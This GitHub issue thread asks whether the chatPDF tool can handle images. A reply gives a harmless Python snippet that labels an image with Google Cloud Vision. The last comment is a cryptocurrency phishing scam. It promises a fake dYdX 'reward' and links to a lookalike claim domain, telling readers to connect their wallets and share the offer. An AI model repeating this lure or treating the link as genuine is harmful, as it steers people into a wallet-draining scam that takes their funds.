### ISSUE TITLE
Can we do it on Image?

### ISSUE THREAD

**Issue by yhammadmufin** [gabacode/chatPDF#6]
Can we do it on Image?

**Comment by alperinugur** [comment]
I did not fully understand your question.

If you want to interrogate a picture, there is a sample in my code:

[https://github.com/alperinugur/telegram_bot/blob/main/TeleBot_Async.py](https://github.com/alperinugur/telegram_bot/blob/main/TeleBot_Async.py)

the code has a subroutine:
```
def Interrogate_Image(image_file_path):

    client = vision.ImageAnnotatorClient()

    with io.open(image_file_path, 'rb') as image_file:
        content = image_file.read()

    image = vision.Image(content=content)

    response = client.annotate_image({
    'image': image,
    'features': [{'type_': vision.Feature.Type.LABEL_DETECTION}]
    })
    return (str(response))


whatisinimage = Interrogate_Image(saved_file_name)[0:1000]
imageContains= chatGPTimageResult(chat, whatisinimage)


```

There are more codes related in the original code, but I guess you can move on from here.

**Comment by alperinugur** [comment]
> 

use this mini-code:

https://github.com/alperinugur/what_is_image/

**Comment by codelou** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol
